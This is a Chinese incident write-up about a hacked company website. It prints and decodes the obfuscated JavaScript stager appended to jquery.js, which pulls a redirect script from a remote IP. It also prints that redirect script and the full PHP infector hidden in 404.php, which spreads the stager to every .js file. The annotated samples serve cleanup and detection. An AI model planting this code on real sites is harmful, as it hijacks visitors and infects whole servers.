公司网站莫名被黑:初次打开时跳转到别的网站,再次打开则不跳转,猜测是写入了 cookie;删除 cookie 后调试,把相关 JS 文件改回来,但网站一旦被访问就再次被感染,影响上百个 JS 文件及部分 PHP 文件。
解决办法:全局清除感染代码(包括 JS 文件末尾被追加的代码和被感染 PHP 文件中的传播代码),并调整文件权限。

(整个病毒的工作原理:Malicious Pastebin Replacement for jQuery)
jquery.js 文件末尾被追加了如下代码,最终跳转地址为一个广告分发中心:

// Stager found appended to jquery.js (malware sample, annotated for cleanup).
// The hex escapes decode to: ["", "join", "reverse", "split", <reversed <script> tag>, "write"].
var _0xaae8 = ["", "\x6A\x6F\x69\x6E", "\x72\x65\x76\x65\x72\x73\x65", "\x73\x70\x6C\x69\x74", "\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C", "\x77\x72\x69\x74\x65"];
// Reads as: document.write(_0xaae8[4].split("").reverse().join(""))
// Reversing index 4 yields <script src="http://134.249.116.78/jquery.js"></script>
// (the URL the browser warning below reports), so every page that loads the
// infected jquery.js also pulls in the remote redirect script.
// Grep all .js files for "_0xaae8" or "134.249.116.78" to find infected copies.
document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))

解码后为:

// Author's decoded rendering of the same stager. Index 4 is stored reversed and
// the inner quotes are not escaped here, so this listing is for reading, not running.
var _0xaae8 = ["", "join", "reverse", "split", ">tpircs/<>"sj.yreuqj/87.611.942.431//:ptth"=crs tpircs<", "write"];
// i.e. document.write(<reversed index 4>) after split("") / reverse() / join(""),
// which injects <script src="http://134.249.116.78/jquery.js"></script> into the page.
document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))

浏览器提示信息:
A Parser-blocking, cross-origin script, http://134.249.116.78/jquery.js, is invoked via document.write. This may be blocked by the browser if the device has poor network connectivity. See https://www.chromestatus.com/feature/5718547946799104 for more details.

跳转后加载的 JS 代码:

// Hex-escaped form of the remote redirect script (malware sample, kept verbatim
// as a signature). Strings are stored in the _0x8a42 table and looked up by index;
// the decoded, readable version is listed further down. Note the line break after
// "!=" is only a wrap of the original single line.
var _0x8a42=["\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x6F\x2E\x61\x64\x32\x75\x70\x2E\x63\x6F\x6D\x2F\x61\x66\x75\x2E\x70\x68\x70\x3F\x69\x64\x3D\x34\x37\x33\x37\x39\x31","\x67\x65\x74\x54\x69\x6D\x65","\x73\x65\x74\x54\x69\x6D\x65","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67","\x3B\x20\x70\x61\x74\x68\x3D","","\x69\x6E\x64\x65\x78\x4F\x66","\x6C\x65\x6E\x67\x74\x68","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x3B","\x63\x6F\x6F\x6B\x69\x65\x45\x6E\x61\x62\x6C\x65\x64","\x2F\x77\x70\x2D\x61\x64\x6D\x69\x6E\x2F","\x70\x61\x74\x68\x6E\x61\x6D\x65","\x63\x73\x72\x66\x5F\x75\x69\x64","\x31","\x2F","\x6C\x6F\x61\x64\x65\x64","\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72","\x6C\x6F\x61\x64","\x6F\x6E\x6C\x6F\x61\x64","\x61\x74\x74\x61\x63\x68\x45\x76\x65\x6E\x74"];function _1q0x(){window[_0x8a42[1]][_0x8a42[0]]= _0x8a42[2]}function _q1x0(_0x762dx3,_0x762dx4,_0x762dx5,_0x762dx6){var _0x762dx7= new Date();var _0x762dx8= new Date();if(_0x762dx5=== null|| _0x762dx5=== 0){_0x762dx5= 3};_0x762dx8[_0x8a42[4]](_0x762dx7[_0x8a42[3]]()+ 3600000* 24* _0x762dx5);document[_0x8a42[5]]= _0x762dx3+ _0x8a42[6]+ escape(_0x762dx4)+ _0x8a42[7]+ _0x762dx8[_0x8a42[8]]()+ ((_0x762dx6)?_0x8a42[9]+ _0x762dx6:_0x8a42[10])}function _z1g1(_0x762dxa){var _0x762dxb=document[_0x8a42[5]][_0x8a42[11]](_0x762dxa+ _0x8a42[6]);var _0x762dxc=_0x762dxb+ _0x762dxa[_0x8a42[12]]+ 1;if((!_0x762dxb) && (_0x762dxa!= document[_0x8a42[5]][_0x8a42[13]](0,_0x762dxa[_0x8a42[12]]))){return null};if(_0x762dxb==  -1){return null};var _0x762dxd=document[_0x8a42[5]][_0x8a42[11]](_0x8a42[14],_0x762dxc);if(_0x762dxd==  -1){_0x762dxd= document[_0x8a42[5]][_0x8a42[12]]};return unescape(document[_0x8a42[5]][_0x8a42[13]](_0x762dxc,_0x762dxd))}if(navigator[_0x8a42[15]]){if(window[_0x8a42[1]][_0x8a42[17]][_0x8a42[11]](_0x8a42[16])!=  
-1){_q1x0(_0x8a42[18],_0x8a42[19],_0x8a42[19],_0x8a42[20])};if(window[_0x8a42[1]][_0x8a42[17]][_0x8a42[11]](_0x8a42[16])==  -1){if(_z1g1(_0x8a42[18])== 1){}else {_q1x0(_0x8a42[18],_0x8a42[19],_0x8a42[19],_0x8a42[20]);if(document[_0x8a42[21]]){_1q0x()}else {if(window[_0x8a42[22]]){window[_0x8a42[22]](_0x8a42[23],_1q0x,false)}else {window[_0x8a42[25]](_0x8a42[24],_1q0x)}}}}}

还原后:

// Decoded redirect script (malware sample, annotated for analysis). Per the
// browser warning above it is served as http://134.249.116.78/jquery.js.
// Only whitespace has been added below; every token is the original.
// String table: 0 href, 1 location, 2 redirect URL, 3 getTime, 4 setTime, 5 cookie,
// 6 "=", 7 ";expires=", 8 toGMTString, 9 "; path=", 10 "", 11 indexOf, 12 length,
// 13 substring, 14 ";", 15 cookieEnabled, 16 "/wp-admin/", 17 pathname,
// 18 "csrf_uid", 19 "1", 20 "/", 21 loaded, 22 addEventListener, 23 load,
// 24 onload, 25 attachEvent.
var _0x8a42=["href","location","http://go.ad2up.com/afu.php?id=473791","getTime","setTime","cookie","=",";expires=","toGMTString","; path=","","indexOf","length","substring",";","cookieEnabled","/wp-admin/","pathname","csrf_uid","1","/","loaded","addEventListener","load","onload","attachEvent"];
// Redirect: window.location.href = "http://go.ad2up.com/afu.php?id=473791"
function _1q0x(){window[_0x8a42[1]][_0x8a42[0]]= _0x8a42[2]}
// Set-cookie helper: _q1x0(name, value, days, path).
// Writes document.cookie = name + "=" + escape(value) + ";expires=" + (now + days*24h).toGMTString()
// + (path ? "; path=" + path : ""). days defaults to 3 when null or 0.
function _q1x0(_0x762dx3,_0x762dx4,_0x762dx5,_0x762dx6){
    var _0x762dx7= new Date();
    var _0x762dx8= new Date();
    if(_0x762dx5=== null|| _0x762dx5=== 0){_0x762dx5= 3};
    _0x762dx8[_0x8a42[4]](_0x762dx7[_0x8a42[3]]()+ 3600000* 24* _0x762dx5);
    document[_0x8a42[5]]= _0x762dx3+ _0x8a42[6]+ escape(_0x762dx4)+ _0x8a42[7]+ _0x762dx8[_0x8a42[8]]()+ ((_0x762dx6)?_0x8a42[9]+ _0x762dx6:_0x8a42[10])
}
// Get-cookie helper: _z1g1(name) returns the unescaped value of cookie `name`
// read from document.cookie, or null when the cookie is absent.
function _z1g1(_0x762dxa){
    var _0x762dxb=document[_0x8a42[5]][_0x8a42[11]](_0x762dxa+ _0x8a42[6]);
    var _0x762dxc=_0x762dxb+ _0x762dxa[_0x8a42[12]]+ 1;
    // index 0 means the cookie is first in the string; confirm the prefix really is `name`
    if((!_0x762dxb) && (_0x762dxa!= document[_0x8a42[5]][_0x8a42[13]](0,_0x762dxa[_0x8a42[12]]))){return null};
    if(_0x762dxb==  -1){return null};
    var _0x762dxd=document[_0x8a42[5]][_0x8a42[11]](_0x8a42[14],_0x762dxc);
    if(_0x762dxd==  -1){_0x762dxd= document[_0x8a42[5]][_0x8a42[12]]};
    return unescape(document[_0x8a42[5]][_0x8a42[13]](_0x762dxc,_0x762dxd))
}
// Main: only runs when navigator.cookieEnabled is true.
if(navigator[_0x8a42[15]]){
    // On /wp-admin/ pages: set cookie csrf_uid=1 (1 day, path "/") and do NOT redirect —
    // presumably so a logged-in site owner never sees the redirect (inferred, not stated).
    if(window[_0x8a42[1]][_0x8a42[17]][_0x8a42[11]](_0x8a42[16])!=  -1){_q1x0(_0x8a42[18],_0x8a42[19],_0x8a42[19],_0x8a42[20])};
    // On every other page: if csrf_uid already == 1, do nothing (this is why only the
    // first visit redirects and clearing cookies reproduces it); otherwise set the
    // cookie and redirect once the page has loaded.
    if(window[_0x8a42[1]][_0x8a42[17]][_0x8a42[11]](_0x8a42[16])==  -1){
        if(_z1g1(_0x8a42[18])== 1){}
        else {
            _q1x0(_0x8a42[18],_0x8a42[19],_0x8a42[19],_0x8a42[20]);
            // document.loaded is non-standard; falls back to a load / onload listener
            if(document[_0x8a42[21]]){_1q0x()}
            else {if(window[_0x8a42[22]]){window[_0x8a42[22]](_0x8a42[23],_1q0x,false)}
            else {window[_0x8a42[25]](_0x8a42[24],_1q0x)}}
        }
    }
}

被感染的 404.php 文件(向 JS 文件写入上述代码的传播程序):

// --- Infector configuration (malware sample from the infected 404.php, annotated for cleanup) ---
// Silences every PHP error so the infector never shows up in output or error logs.
error_reporting(0);
// Only .js files whose basename also contains this substring are targeted;
// 'e' matches most filenames (e.g. jquery.js).
$file_name = 'e';
// Payload written into every targeted .js file: the same obfuscated document.write()
// stager listed at the top of this page (index 4 is a reversed <script> tag that
// loads http://134.249.116.78/jquery.js). This exact string is the signature to
// search for when cleaning.
$text = 'var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))';
// 2 = append the payload to the end of each file; any other value = prepend it.
$position = 2;
// Recursively walks $dir and writes $text into every matching .js file that does
// not already contain it. Because it skips files already carrying the payload and
// runs again on each request that reaches this 404 handler, any .js file that is
// cleaned while this file is still on the server is simply re-infected — remove the
// infector before (or together with) cleaning the .js files.
function getDirContents($dir) {
    global $file_name, $text, $position;
    $files = scandir($dir);
    foreach($files as $key => $value){
        $path = realpath($dir.DIRECTORY_SEPARATOR.$value);
        if(!is_dir($path)) {
            $path_info = pathinfo($path);
			// stripos is case-insensitive and matches anywhere in the name, so ".JS"
			// and names merely containing ".js" qualify too
			$pos3 = stripos($path_info['basename'], '.js');
			 if($pos3 !== false){
			    $pos2 = stripos($path_info['basename'], $file_name);
				if($pos2 !== false) {

					// Emitted once per candidate file; presumably keeps the HTTP response
					// looking like an ordinary error page (inferred)
					echo 'Error_Page_Not_Found ';
					// Skip files that already contain the payload (no duplicate injection)
					$pos1 = stripos(file_get_contents($path), $text);
					if ($pos1 === false) { 
					//echo 'EDIT '.$path."\n";
					if($position == 2) { 
						file_put_contents($path, $text, FILE_APPEND);					
						}
						 else {
							file_put_contents($path, $text.file_get_contents($path));
					}
					}

					}
			}		
        } elseif($value != "." && $value != "..") {
            // recurse into subdirectories
            getDirContents($path);
        }
    }

	
}

//start
// Entry point: picks the directory where the recursive infection walk begins.
// DOCUMENT_ROOT is searched for common hosting directory names in the order
// below and is truncated just AFTER the first match, so the walk can start
// above this site's own document root (everything under /vhosts/, /www/, ...).
// On shared hosting this means sibling sites under the same parent directory
// may have been infected as well — include them in the cleanup scan.
// Falls back to DOCUMENT_ROOT itself when none of the names match.
$path = $_SERVER['DOCUMENT_ROOT'];
//public_html
$pos1 = stripos($path,'/public_html/');
if ($pos1 !== false){
$rest = substr($path, 0, stripos($path, '/public_html/') + strlen('/public_html/'));
getDirContents($rest);
} else { 
 //html
 $pos1 = stripos($path,'/html/');
 if ($pos1 !== false){
 $rest = substr($path, 0, stripos($path, '/html/') + strlen('/html/'));
 getDirContents($rest);
 } else {
	//httpdocs
	$pos1 = stripos($path,'/httpdocs/');
	if ($pos1 !== false){
	$rest = substr($path, 0, stripos($path, '/httpdocs/') + strlen('/httpdocs/'));
	getDirContents($rest);
	} else {
		//vhosts
		$pos1 = stripos($path,'/vhosts/');
		if ($pos1 !== false){
		$rest = substr($path, 0, stripos($path, '/vhosts/') + strlen('/vhosts/'));
		getDirContents($rest);
		} else {
			//www
			$pos1 = stripos($path,'/www/');
			if ($pos1 !== false){
			$rest = substr($path, 0, stripos($path, '/www/') + strlen('/www/'));
			getDirContents($rest);
			} else {
				//wwwroot
				$pos1 = stripos($path,'/wwwroot/');
				if ($pos1 !== false){
				$rest = substr($path, 0, stripos($path, '/wwwroot/') + strlen('/wwwroot/'));
				getDirContents($rest);
				} else {
					//web
					$pos1 = stripos($path,'/web/');
					if ($pos1 !== false){
					$rest = substr($path, 0, stripos($path, '/web/') + strlen('/web/'));
					getDirContents($rest);
					} else {
					// no known hosting directory in the path: walk the document root itself
					getDirContents($_SERVER['DOCUMENT_ROOT']);	
				}}	
			}	
		}	
	}
 }	
 
}

作者 铁血 汉子 2017年2月7日